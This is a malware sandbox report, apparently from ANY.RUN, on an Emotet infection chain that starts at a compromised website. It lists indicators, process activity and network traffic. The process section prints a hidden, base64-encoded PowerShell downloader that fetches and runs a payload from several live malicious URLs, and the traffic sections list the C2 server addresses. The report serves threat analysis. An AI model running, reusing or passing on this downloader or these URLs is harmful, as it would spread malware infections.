analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://kbelectricals.co.in/wp-admin/swift/b7oc69672/

Full analysis: https://app.any.run/tasks/e76ddf55-2cd8-4904-8c94-a70877ae07e3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2020, 17:43:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
opendir
loader
trojan
Indicators:
MD5:

2989CB3E571432CC1C3237E8CDAF422E

SHA1:

65184397F4D2191C7706652D109C99D7F2D0C090

SHA256:

7475CE7BFCD42BFB6C8755BC6CCDABD92111C19BA93C1C93C1982F4452A3EBDC

SSDEEP:

3:N1KVHApRcsLGQjn5Z13:CC3Jjn5Zt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • firefox.exe (PID: 1956)
      • WINWORD.EXE (PID: 2252)
    • Application was dropped or rewritten from another process

      • 416.exe (PID: 3276)
      • serialfunc.exe (PID: 4016)
      • serialfunc.exe (PID: 856)
      • 416.exe (PID: 4012)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 3952)
    • Emotet process was detected

      • 416.exe (PID: 4012)
    • EMOTET was detected

      • serialfunc.exe (PID: 4016)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 4016)
    • Connects to CnC server

      • serialfunc.exe (PID: 4016)
  • SUSPICIOUS

    • Creates files in the program directory

      • firefox.exe (PID: 1956)
    • Starts Microsoft Office Application

      • firefox.exe (PID: 1956)
      • WINWORD.EXE (PID: 2252)
    • Application launched itself

      • WINWORD.EXE (PID: 2252)
      • serialfunc.exe (PID: 856)
    • PowerShell script executed

      • Powershell.exe (PID: 3952)
    • Executed via WMI

      • Powershell.exe (PID: 3952)
    • Creates files in the user directory

      • Powershell.exe (PID: 3952)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 3952)
      • 416.exe (PID: 4012)
    • Starts itself from another location

      • 416.exe (PID: 4012)
    • Connects to server without host name

      • serialfunc.exe (PID: 4016)
    • Connects to SMTP port

      • serialfunc.exe (PID: 4016)
    • Connects to unusual port

      • serialfunc.exe (PID: 4016)
  • INFO

    • Reads CPU info

      • firefox.exe (PID: 1956)
    • Application launched itself

      • firefox.exe (PID: 1956)
    • Reads Internet Cache Settings

      • firefox.exe (PID: 1956)
    • Creates files in the user directory

      • firefox.exe (PID: 1956)
      • WINWORD.EXE (PID: 2252)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2252)
      • WINWORD.EXE (PID: 184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
13
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe firefox.exe firefox.exe winword.exe no specs winword.exe no specs powershell.exe 416.exe no specs #EMOTET 416.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2520"C:\Program Files\Mozilla Firefox\firefox.exe" "http://kbelectricals.co.in/wp-admin/swift/b7oc69672/"C:\Program Files\Mozilla Firefox\firefox.exeexplorer.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
68.0.1
1956"C:\Program Files\Mozilla Firefox\firefox.exe" http://kbelectricals.co.in/wp-admin/swift/b7oc69672/C:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Version:
68.0.1
2084"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1956.0.43858104\646726711" -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 1956 "\\.\pipe\gecko-crash-server-pipe.1956" 1136 gpuC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Version:
68.0.1
3984"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1956.3.1313555930\489307633" -childID 1 -isForBrowser -prefsHandle 1692 -prefMapHandle 796 -prefsLen 1 -prefMapSize 191824 -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 1956 "\\.\pipe\gecko-crash-server-pipe.1956" 1712 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
68.0.1
2424"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1956.13.1389795052\815133544" -childID 2 -isForBrowser -prefsHandle 2880 -prefMapHandle 2884 -prefsLen 5996 -prefMapSize 191824 -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 1956 "\\.\pipe\gecko-crash-server-pipe.1956" 2896 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
68.0.1
2176"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1956.20.756050695\338852998" -childID 3 -isForBrowser -prefsHandle 3996 -prefMapHandle 3700 -prefsLen 7129 -prefMapSize 191824 -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 1956 "\\.\pipe\gecko-crash-server-pipe.1956" 3664 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
68.0.1
2252"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\PAY_RIC_010120_WSN_011720.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEfirefox.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
184"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3952Powershell -w hidden -en JABUAHEAcABrAGUAdgB1AGUAcQBuAHQAcwB4AD0AJwBIAHcAZAB1AG8AYwB4AHQAbwAnADsAJABLAHcAcgBhAHUAbgBpAHEAcwBlAHYAcQBoACAAPQAgACcANAAxADYAJwA7ACQAQQBhAGQAegBqAHUAbABkAHIAPQAnAFAAZABxAHMAYgBuAGEAdgBsAGkAbQB4AHkAJwA7ACQASgB4AHMAZgB5AHEAcgB6AGkAdwBpAGQAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASwB3AHIAYQB1AG4AaQBxAHMAZQB2AHEAaAArACcALgBlAHgAZQAnADsAJABRAHYAdgB4AGIAegBlAG8AdQBkAG4APQAnAFgAbABlAG4AdABhAG8AcQB4AGoAJwA7ACQARwBnAGQAZwBlAG8AdgBnAG8AeABvAGIAZQA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AEUAYgBjAEwASQBlAE4AdAA7ACQASgB6AGkAbgB0AG0AagBvAGQAPQAnAGgAdAB0AHAAOgAvAC8AawBpAHoAaQBsAHQAZQBwAGUAYQBrAHkAdQB6AHIAZQBoAGEAYgBpAGwAaQB0AGEAcwB5AG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgA5AG4AMgAvACoAaAB0AHQAcAA6AC8ALwBzAGkAdABlAHMAZQB0AHUAcAAuAGMAaQBuAGQAeQBkAG8AbgBvAHYAYQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA4ADEAeQBuAGcAbABnAC8AKgBoAHQAdABwAHMAOgAvAC8AagBhAGIAZQByAGUAdgBlAG4AdABzAC4AYwBvAG0ALwB5ADQAOABoAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcABkAGkAbgBoAHYAaQB2AGkAZQB0AHQAZQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcAB3AGgAbQA2AHAALwAqAGgAdAB0AHAAcwA6AC8ALwBtAGEAcgBzAGgAYQBsAGcAcgBvAHUAcAAuAG8AcgBnAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBkAGgAMQAvACcALgAiAFMAcABgAGwAaQBUACIAKAAnACoAJwApADsAJABOAHAAbwB5AG4AZABlAG4AdwA9ACcASAB1AG0AdgBrAHAAdwBvAG4AegBxACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGUAbgBrAGMAeQB0AHoAeQBwAHQAIABpAG4AIAAkAEoAegBpAG4AdABtAGoAbwBkACkAewB0AHIAeQB7ACQARwBnAGQAZwBlAG8AdgBnAG8AeABvAGIAZQAuACIAZABgAE8AdwBuAEwATwBBAEQARgBgAGkAbABlACIAKAAkAEcAZQBuAGsAYwB5AHQAegB5AHAAdAAsACAAJABKAHgAcwBmAHkAcQByAHoAaQB3AGkAZABnACkAOwAkAEQAegBkAHkAeAB3AHMAbAB6AHIAbgBrAHAAPQAnAFoAaQB6AG8AdAB2AHgAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQASgB4AHMAZgB5AHEAcgB6AGkAdwBpAGQAZwApAC4AIgBMAGUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAzADcAOQA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAEEAUgB0ACIAKAAkAEoAeABzAGYAeQBxAHIAegBpAHcAaQBkAGcAKQA7ACQAQgB1AGkAZwB4AHMAcAB2AD0AJwBHAHAAegBsAGUAaABkAHoAbAB1AGEAcQBwACcAOwBiAHIAZQBhAGsAOwAkAEMAZABkAGYAZwB4AHQAdAB2AHEAcQBxAGsAPQAnAEEAdQBzAHoAYwBrAG8AaAByAHEAcABnACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAbABmAGQAZwB1AHAAbABwAGkAPQAnAFYAZAB1AG8AcQBzAGoAdAB1AGYAeAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3276"C:\Users\admin\416.exe" C:\Users\admin\416.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Total events
3 562
Read events
2 650
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
71
Text files
28
Unknown types
47

Dropped files

PID
Process
Filename
Type
1956firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-current.bin
MD5:
SHA256:
1956firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs-1.js
MD5:
SHA256:
1956firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.tmp
MD5:
SHA256:
1956firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
MD5:
SHA256:
1956firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
MD5:
SHA256:
1956firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
MD5:
SHA256:
1956firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4.tmp
MD5:
SHA256:
1956firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4jsonlz4
MD5:6D378E0D40B6EACA22C8BCE899A1C5C1
SHA256:ADA2467B2477ACEFF837AC7820C435AD1EBBE844B2DA31C7AB9AE8D010C7A639
1956firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-child-current.binbinary
MD5:5027177F513CDAE07DB2330E1DED5934
SHA256:0C53F16051E738287A4612F68E296238087627E594CFD6DDFA1FECC2E998328B
1956firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\urlCache-current.binbinary
MD5:DE9496ACA551ADE408EF6466A11833A1
SHA256:8F9C7FDB3E0BC01024E43A8E242468FC4DD4F74C725E32A883571635203DC10A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
77
DNS requests
133
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1956
firefox.exe
GET
200
85.187.128.26:80
http://kbelectricals.co.in/wp-admin/swift/b7oc69672/
US
document
167 Kb
suspicious
3952
Powershell.exe
GET
200
185.46.54.218:80
http://kiziltepeakyuzrehabilitasyon.com/wp-includes/69n2/
TR
executable
332 Kb
malicious
1956
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
1956
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
1956
firefox.exe
POST
200
172.217.22.35:80
http://ocsp.pki.goog/gts1o1
US
der
471 b
whitelisted
4016
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/1xpZtCEPcoDcpuark4
US
binary
1.38 Mb
malicious
1956
firefox.exe
POST
200
172.217.22.35:80
http://ocsp.pki.goog/gts1o1
US
der
471 b
whitelisted
1956
firefox.exe
GET
200
2.16.186.112:80
http://detectportal.firefox.com/success.txt
unknown
text
8 b
whitelisted
4016
serialfunc.exe
POST
91.236.4.234:443
http://91.236.4.234:443/VVfr9dwJLeAdoOH
PL
malicious
4016
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/CjHdU
US
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1956
firefox.exe
52.222.174.142:443
snippets.cdn.mozilla.net
Amazon.com, Inc.
US
unknown
1956
firefox.exe
35.164.109.147:443
search.services.mozilla.com
Amazon.com, Inc.
US
unknown
1956
firefox.exe
85.187.128.26:80
kbelectricals.co.in
A2 Hosting, Inc.
US
unknown
1956
firefox.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1956
firefox.exe
2.16.186.112:80
detectportal.firefox.com
Akamai International B.V.
whitelisted
1956
firefox.exe
52.25.237.163:443
push.services.mozilla.com
Amazon.com, Inc.
US
malicious
1956
firefox.exe
52.222.174.194:443
content-signature-2.cdn.mozilla.net
Amazon.com, Inc.
US
unknown
1956
firefox.exe
172.217.16.174:443
www.youtube.com
Google Inc.
US
whitelisted
1956
firefox.exe
54.69.207.70:443
tiles.services.mozilla.com
Amazon.com, Inc.
US
unknown
1956
firefox.exe
52.222.174.232:443
firefox.settings.services.mozilla.com
Amazon.com, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
kbelectricals.co.in
  • 85.187.128.26
suspicious
detectportal.firefox.com
  • 2.16.186.112
  • 2.16.186.50
whitelisted
a1089.dscd.akamai.net
  • 2.16.186.50
  • 2.16.186.112
whitelisted
search.services.mozilla.com
  • 35.164.109.147
  • 52.35.182.58
  • 52.89.218.39
whitelisted
search.r53-2.services.mozilla.com
  • 52.89.218.39
  • 52.35.182.58
  • 35.164.109.147
whitelisted
push.services.mozilla.com
  • 52.25.237.163
whitelisted
autopush.prod.mozaws.net
  • 52.25.237.163
whitelisted
snippets.cdn.mozilla.net
  • 52.222.174.142
  • 52.222.174.154
  • 52.222.174.150
  • 52.222.174.186
whitelisted
d228z91au11ukj.cloudfront.net
  • 52.222.174.186
  • 52.222.174.150
  • 52.222.174.154
  • 52.222.174.142
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Observed DNS Query to .cloud TLD
Potentially Bad Traffic
ET INFO Observed DNS Query to .cloud TLD
3952
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3952
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3952
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
4016
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
4016
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
4016
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
4016
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
4016
serialfunc.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
No debug info